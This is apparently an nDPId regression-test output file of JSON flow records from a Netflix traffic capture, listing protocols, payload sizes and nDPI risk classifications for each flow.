+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 
